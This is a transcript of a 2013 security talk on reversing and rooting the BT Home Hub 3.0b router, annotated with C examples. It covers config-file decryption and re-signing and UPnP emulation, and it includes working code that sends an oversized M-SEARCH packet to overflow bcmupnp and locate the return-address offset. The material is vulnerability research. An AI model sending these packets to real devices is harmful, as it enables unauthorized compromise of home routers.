BT CPE Devices:Adventures in Reversing and Exploiting

Reversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

• Zachary Cutlip

• Senior Vulnerability Researcher, Tactical Network Solutions, LLC

Home Hub 3.0b

Home Hub 3.0b (back)

Home Hub 3.0b

Manufacturer: Huawei

CPU: Broadcom BCM6361 (dual core 400 MHz MIPS32)

RAM: 64 MB DDR2 800 SDRAM

Flash Storage: 32 MB NAND Flash, TSOP48 package

OS: Linux 2.6.30

Firmware managed by ISP

Backstory

• forum.kitz.co.uk users wanted to hack their modems

• Forum user emailed, requesting help

• Shipped me hardware

• Another user had already extracted firmware


Goal

• Overall goal:

  • Unlock HH3b configuration options, and/or

• Immediate goal:

  • Get interactive root prompt


Attack Surface

• Web interface

• UPnP

• Configuration backup file


Command injection

• Common in SOHO routers

• Unsanitized input + system()

• Easy to discover/exploit

• Portable

• Can be limited


Example: Trendnet TEW-654TR


Injecting shell commands: You can do it, too!


Investigating

• grep for strings with shell-style redirects

• e.g. “%s %s > /dev/null”

• Verify which, if any:

• Are passed to a shell invocation

• Are combined with user-supplied input


Promising lead

• HH3b’s ‘cms’ application

• Gets executed by web server

• executes lots of commands, e.g. iptables

• Lots of “shell-like” strings, such as....

“My God. It’s full of %s.”

iptables %s -%c %s %s %s %s %s %s %s %s %s %s %s 2>/dev/null

Twelve input strings, and a shell redirect (2>/dev/null) at the end.

Seriously. We’re done. Time for beers.


Do we have command injection?

• Unsanitized user input?

• That may be hard to verify

• First, verify how this gets executed


HH3b command execution

• Command string generated with snprintf()

• Passed to QosExec()

• Passed to ATP_Util_ExecCmdNoHang()

ATP_Util_ExecCmdNoHang

• WHAT...

  • Parse command string into array

  • Open file referenced by shell redirect

• THE...

  • fork()

  • dup2() the opened redirect

  • execv() command

  • wait()

• FUCK.

  • No “/bin/sh -c”

Well played, BT
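Why the twelve %s lead nowhere is worth seeing in code. The program below is an added example written for this page, not code from the talk or from the HH3b firmware, and it reproduces the pattern the slides summarise for ATP_Util_ExecCmdNoHang(): snprintf() the command, split it into an argv array, open the file named by the trailing redirect, then fork()/dup2()/execv()/wait(). The slides do not say how the real function tokenises or which redirect forms it accepts; here only a final "N>path" token is treated as a redirect, which is this example's assumption. Run it and the payload "hello;id" comes out of /bin/echo as one literal word, because execv() takes an argv array and ';' is just a byte in it. The caveat a reviewer should keep in mind is that this defeats command injection, not argument injection: whitespace in attacker input still produces extra argv words for the target program (extra iptables flags, for instance), and execv() does not search PATH, so argv[0] has to be resolvable by the caller.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_ARGS 32
#define CMD_LEN  512

/* A command split the way the slides describe: whitespace-separated argv
 * plus, optionally, one trailing "N>path" redirect such as "2>/dev/null". */
struct parsed_cmd {
    char        buf[CMD_LEN];      /* private, tokenised copy of the command */
    char       *argv[MAX_ARGS + 1];
    int         argc;
    int         redir_fd;          /* descriptor named by the redirect, or -1 */
    const char *redir_path;        /* redirect target, or NULL */
};

/* Tokenise on spaces/tabs. Only the FINAL token is examined as a redirect
 * (an assumption about the real function). Every other token goes to
 * execv() verbatim, so ';', '|', '`', '$' and '&' carry no meaning at all. */
static int parse_cmd(const char *cmd, struct parsed_cmd *p)
{
    if (strlen(cmd) >= sizeof p->buf)
        return -1;
    strcpy(p->buf, cmd);
    p->argc = 0;
    p->redir_fd = -1;
    p->redir_path = NULL;

    char *save = NULL;
    for (char *tok = strtok_r(p->buf, " \t", &save); tok;
         tok = strtok_r(NULL, " \t", &save)) {
        if (p->argc >= MAX_ARGS)
            return -1;
        p->argv[p->argc++] = tok;
    }
    if (p->argc == 0)
        return -1;

    char *last = p->argv[p->argc - 1];
    if (last[0] == '>' && last[1] != '\0') {            /* ">path" means stdout */
        p->redir_fd = 1;
        p->redir_path = last + 1;
        p->argc--;
    } else if (last[0] >= '0' && last[0] <= '9' && last[1] == '>' && last[2] != '\0') {
        p->redir_fd = last[0] - '0';                    /* "N>path" */
        p->redir_path = last + 2;
        p->argc--;
    }
    p->argv[p->argc] = NULL;
    return p->argc > 0 ? 0 : -1;
}

/* fork()/dup2()/execv()/wait(), as the slides summarise the real function.
 * Returns the child's exit status, 127 if execv() failed, -1 on other errors. */
static int run_no_shell(const struct parsed_cmd *p)
{
    int fd = -1;
    if (p->redir_path) {
        fd = open(p->redir_path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            return -1;
    }
    pid_t pid = fork();
    if (pid < 0) {
        if (fd >= 0) close(fd);
        return -1;
    }
    if (pid == 0) {
        if (fd >= 0) {
            dup2(fd, p->redir_fd);     /* wire the opened file to the named fd */
            close(fd);
        }
        execv(p->argv[0], p->argv);    /* no "/bin/sh -c", no PATH search */
        _exit(127);
    }
    if (fd >= 0) close(fd);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* snprintf() the format with one attacker-influenced value, then execute it. */
static int exec_fmt(const char *fmt, const char *arg)
{
    char cmd[CMD_LEN];
    struct parsed_cmd p;
    int n = snprintf(cmd, sizeof cmd, fmt, arg);
    if (n < 0 || (size_t)n >= sizeof cmd || parse_cmd(cmd, &p) < 0)
        return -1;
    return run_no_shell(&p);
}

int main(void)
{
    /* Classic injection payload. Under system() the ';' would start a second
     * command; here "hello;id" reaches /bin/echo as one literal argv word. */
    int rc = exec_fmt("/bin/echo %s 2>/dev/null", "hello;id");
    printf("echo exited with %d; nothing after the ';' was executed\n", rc);
    return rc == 0 ? 0 : 1;
}
```

To see the difference, swap run_no_shell() for system(cmd) on the same string: the shell splits on ';' and runs id. With execv() the only things that reach the kernel are the program path and a NULL-terminated array of words.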

Config backup

• Assumed to be well formed → memory corruption?

• If parsed by a shell script, command injection

• Options in the configuration grammar, but hidden from the GUI

• Undocumented backdoor credentials?

• Enable SSH?


Config backup

• Usually obfuscated for tamper-resistance

• Encrypted

• Robust, well-known encryption

• Custom “encryption”

• Signed

Encrypted config

• Custom encryption implementations

  • Often not mindful of cryptography principles

  • May be reverse engineered and re-implemented

• Strong, well-known implementations

  • Algorithms are sound

  • If keys are protected, not easily defeated


HH3b uses AES for encrypting configs


Encrypted config

• HH3b uses AES

• Assumed unique per-user/per-device keys

• Almost didn’t analyze, not worth it


Encrypted Config

• But wait...

• A new modem should restore an old backup

• I had two HH3bs, so I tried it...

• ....And it worked!


Config import/export

• Reversed config import/export API

• XML data

• compressed with ‘gzip’

• AES encrypted

• Base-64 encoded

• 128-bit AES signature prepended


Signature check, then decryption


Config import API

• ATP_CFM_ExtDigVerifyFile

• Checks & removes signature

• ATP_CFM_ExtCustomImportEncryptedUserCfgFile

• Base64 decode

• Decrypt

• Decompress with ‘gunzip’

Straightforward API

QEMU first attempt

• Cross compile decryption tool

• link against libcfmapi.so

• Run in QEMU MIPS emulator

• Weird dynamic linker errors

• Missing functions, like:

• PZMM_K_Fun2()


Missing functions

• Linker can’t find several functions

• Strings analysis finds them in unrelated libs

• PZMM_K_Fun1-4 build AES key

• PZMM_I_Fun1-4 build AES IV


QEMU second attempt

• LD_PRELOAD various libs

• Run in QEMU again

• Success! Decrypted config file

Decrypted config

Re-encrypt, re-sign

• Reverse the process

• Modify config file

• Call encryption & signing functions

• Upload to HH3b

• Success!


Snagged AES Key

Because why not?


No attack vectors in the config file


Default configuration

• Same trick applies to defaultcfg.xml

• Many more configuration options

• Remote admin creds, etc

• Schema incompatible with backup config

• Modifying and uploading was not successful


Buffer Overflows

• No easy 1996-style bugs

• Highly unusual for SOHO routers

• One exception…


Shaky program

• One binary was promising: ‘bcmupnp’

• Lots of use of sprintf(),strcpy(), etc.

• Hard to analyze: didn’t disassemble cleanly

• Lots of functions with no x-refs.

• Lots of jump tables


Dynamic analysis

• Static analysis is frustrated by poor disassembly

• Need to run & debug for dynamic analysis

• QEMU

• Tutorial: http://bit.ly/15pCvSy

Emulation problems

• ‘bcmupnp’: UPnP server that manages wireless hardware

• Provided by Broadcom

• Won’t run in emulated environment

• Assumptions about hardware that is present

• NVRAM unavailable for configuration queries


Emulation problems

• Wrote an NVRAM ‘faker’ library:

• https://github.com/zcutlip/nvram-faker

• Provides responses to nvram_get() queries

• INI-style configuration file
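The faker linked above is the real tool; the sketch below is an added example written for this page, not the nvram-faker source, and shows the mechanism the slide describes: a shared object that exports nvram_get() and answers from an INI-style table, built with `-shared -fPIC` (cross-compiled for the target when run under qemu-mips, and injected with `qemu-mips -E LD_PRELOAD=./libnvram-faker.so ...`). The one habit worth copying is that every key the target asks for and the INI does not have is logged to stderr, so the configuration can be filled in iteratively until the binary gets past its start-up checks. The NVRAM_INI environment variable name, the table size and the sample keys are this example's choices, not the tool's.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define FAKER_MAX 128

/* In-memory copy of the INI file: this is the fake NVRAM. */
static struct { char key[64]; char val[256]; } table[FAKER_MAX];
static int table_len;

static char *trim(char *s)
{
    while (isspace((unsigned char)*s)) s++;
    char *e = s + strlen(s);
    while (e > s && isspace((unsigned char)e[-1])) *--e = '\0';
    return s;
}

static int find_key(const char *name)
{
    for (int i = 0; i < table_len; i++)
        if (strcmp(table[i].key, name) == 0) return i;
    return -1;
}

void nvram_faker_clear(void) { table_len = 0; }

/* Parse INI text: blank lines, '#'/';' comments and "[section]" headers are
 * skipped, "key = value" lines are stored (a later duplicate overrides an
 * earlier one), anything else is logged and ignored. Returns lines accepted. */
int nvram_faker_load_text(const char *text)
{
    char *copy = strdup(text);
    if (!copy) return -1;
    int accepted = 0;
    char *save = NULL;
    for (char *line = strtok_r(copy, "\r\n", &save); line;
         line = strtok_r(NULL, "\r\n", &save)) {
        line = trim(line);
        if (*line == '\0' || *line == '#' || *line == ';' || *line == '[')
            continue;
        char *eq = strchr(line, '=');
        if (!eq || eq == line) {
            fprintf(stderr, "[nvram-faker] ignoring line, not key=value: %s\n", line);
            continue;
        }
        *eq = '\0';
        const char *key = trim(line), *val = trim(eq + 1);
        int idx = find_key(key);
        if (idx < 0) {
            if (table_len >= FAKER_MAX) {
                fprintf(stderr, "[nvram-faker] table full, dropping %s\n", key);
                continue;
            }
            idx = table_len++;
        }
        snprintf(table[idx].key, sizeof table[idx].key, "%s", key);
        snprintf(table[idx].val, sizeof table[idx].val, "%s", val);
        accepted++;
    }
    free(copy);
    return accepted;
}

int nvram_faker_load_file(const char *path)
{
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    char buf[16384];
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return nvram_faker_load_text(buf);
}

/* The symbol the target resolves at load time. With this library in
 * LD_PRELOAD it shadows libnvram's nvram_get(), so the UPnP daemon's
 * configuration queries are answered from the INI. Unknown keys are logged
 * so the analyst can see exactly what the binary wanted and add it. */
char *nvram_get(const char *name)
{
    int idx = find_key(name);
    if (idx < 0) {
        fprintf(stderr, "[nvram-faker] nvram_get(\"%s\"): not in INI, returning NULL\n", name);
        return NULL;
    }
    return table[idx].val;
}

/* Runs when the library is loaded; NVRAM_INI is this example's variable name. */
__attribute__((constructor)) static void nvram_faker_init(void)
{
    const char *path = getenv("NVRAM_INI");
    if (path && nvram_faker_load_file(path) < 0)
        fprintf(stderr, "[nvram-faker] cannot read %s\n", path);
}

int main(void)
{
    /* Constructed sample INI standing in for the file NVRAM_INI would name. */
    static const char sample[] =
        "# constructed example, not a capture from a Home Hub\n"
        "[wireless]\n"
        "wl0_ssid = testnet\n"
        "wl0_radio = 1\n"
        "[lan]\n"
        "lan_ipaddr = 192.168.1.254\n";
    nvram_faker_load_text(sample);
    const char *missing = nvram_get("wl1_ssid");
    printf("wl0_ssid=%s lan_ipaddr=%s wl1_ssid=%s\n", nvram_get("wl0_ssid"),
           nvram_get("lan_ipaddr"), missing ? missing : "(unset)");
    return 0;
}
```

Keys are looked up exactly as the target spells them; the stderr log is the feedback loop that turns "just idles" into a list of the values the daemon is missing.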


Emulation problems

• With NVRAM solved, ‘bcmupnp’ runs

• Just idles

• No response to M-SEARCH queries

• More reverse engineering


Binary Patching

• With no hardware to manage, M-SEARCHes are ignored

• A field in a global struct gets modified if there’s no wireless hardware

• Binary patched out the modification


Before and After


Emulation success

• NVRAM Faked

• Patched hardware check

• ‘bcmupnp’ runs and responds to M-SEARCH!


A bug and a crash

• strcpy() of ST:uuid: from M-SEARCH

• Excessively long uuid string crashes ‘bcmupnp’


ST:uuid buffer overflow


Custom M-SEARCH


CRASH!!

jr to 0x41414141 == pwnage
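A crash at 0x41414141 says the saved return address is attacker data; it does not yet say which bytes of the ST: uuid: value landed there. The C below is an added example for this page, not the talk's PoC and not Bowcaster, and shows the next step with the same ingredients: a cyclic pattern instead of a run of 'A's, an M-SEARCH whose ST: uuid: value is that pattern, and a function that maps the four bytes found in the faulting register back to an offset in the input. The SSDP request layout and the 239.255.255.250:1900 destination are the standard discovery format; the slides only show that the uuid value is what bcmupnp strcpy()s. The uuid length and the register value used in main() are placeholders, since the slides give neither the buffer size nor the offset.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PATTERN_MAX 20280   /* 26 * 26 * 10 * 3 bytes, after which it repeats */

/* Cyclic "Aa0Aa1Aa2..." pattern: every 4-byte window is unique within the
 * first PATTERN_MAX bytes, so four bytes pulled from a crashed register
 * identify exactly where in the input they came from. Returns bytes written. */
size_t cyclic_pattern(char *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z'; a++)
        for (char b = 'a'; b <= 'z'; b++)
            for (char c = '0'; c <= '9'; c++) {
                const char trip[3] = { a, b, c };
                for (int i = 0; i < 3; i++) {
                    if (n >= len) return n;
                    out[n++] = trip[i];
                }
            }
    return n;
}

/* Map a register value back to a pattern offset. On big-endian MIPS the
 * bytes sit in the register in memory order; pass big_endian=0 for LE. */
long pattern_offset(uint32_t reg, int big_endian)
{
    static char pat[PATTERN_MAX];
    size_t n = cyclic_pattern(pat, sizeof pat);
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(big_endian ? reg >> (24 - 8 * i) : reg >> (8 * i));
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* SSDP M-SEARCH whose "ST: uuid:" value is an oversized pattern. Returns the
 * packet length, or -1 if it does not fit in the caller's buffer. */
int build_msearch(char *out, size_t cap, size_t uuid_len)
{
    char *uuid = malloc(uuid_len + 1);
    if (!uuid) return -1;
    uuid[cyclic_pattern(uuid, uuid_len)] = '\0';
    int n = snprintf(out, cap,
                     "M-SEARCH * HTTP/1.1\r\n"
                     "HOST: 239.255.255.250:1900\r\n"
                     "MAN: \"ssdp:discover\"\r\n"
                     "MX: 2\r\n"
                     "ST: uuid:%s\r\n"
                     "\r\n", uuid);
    free(uuid);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* One UDP datagram to port 1900: the multicast group or a unicast address. */
int send_msearch(const char *dst_ip, const char *pkt, size_t len)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) return -1;
    struct sockaddr_in to = { .sin_family = AF_INET, .sin_port = htons(1900) };
    if (inet_pton(AF_INET, dst_ip, &to.sin_addr) != 1) { close(s); return -1; }
    ssize_t sent = sendto(s, pkt, len, 0, (struct sockaddr *)&to, sizeof to);
    close(s);
    return sent == (ssize_t)len ? 0 : -1;
}

int main(int argc, char **argv)
{
    /* Usage: ./msearch <uuid_len> [dst_ip]. 1024 is a placeholder length. */
    size_t uuid_len = argc > 1 ? strtoul(argv[1], NULL, 10) : 1024;
    char pkt[4096];
    int n = build_msearch(pkt, sizeof pkt, uuid_len);
    if (n < 0) { fprintf(stderr, "uuid too long for packet buffer\n"); return 1; }
    if (argc > 2 && send_msearch(argv[2], pkt, (size_t)n) != 0) { perror("sendto"); return 1; }
    /* Constructed illustration: a jr to 0x41613341 ("Aa3A") means offset 9. */
    printf("%d-byte M-SEARCH built; a crash at 0x41613341 would mean offset %ld\n",
           n, pattern_offset(0x41613341u, 1));
    return 0;
}
```

Once the offset is known, the four bytes at that position become the address of the payload and everything else in the pattern is free for the payload itself; that is the part Bowcaster packages up, along with the MIPS/Linux connect-back payloads the next slides mention.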


MIPS Buffer Overflows

• Black Hat 2012

• “From SQL Injection to MIPS Overflows”

• https://vimeo.com/64809593


Bowcaster

• Exploit Development Framework

• Python

• Lightweight

• Buffer overflow API

• MIPS/Linux-specific payloads

• Useful utilities


Bowcaster

https://github.com/zcutlip/bowcaster


Develop exploit

• Buffer overflow via single multicast packet

• Made easy(ier) with Bowcaster

• Root shell via connect-back payload

• Tested against ‘bcmupnp’ in QEMU


Tested against live device

Root prompt on the first try.


Proof-of-Concept Exploit:

http://github.com/zcutlip/exploit-poc


Root or it didn’t happen.


Future Work

• Still no unlock yet

• Bricked a HH3b after rooting

• Need a firmware update file for recovery

• Need to evade filesystem integrity check


Future Work

• HomeHub 4

• Need to extract firmware

• Tiny flash chip

• BGA form factor


Acknowledgments

• Craig Heffner

• Tactical Network Solutions

• William Kirby

• kitz.co.uk user ‘asbokid’

• PsiDOC.com user ‘dmcdonnell’


Resources

http://goo.gl/lzjx7C  [shadow-file.blogspot.com]

• Talk to me:

[email protected]

[email protected]

• @zcutlip on Twitter

• http://shadow-file.blogspot.com


Questions?
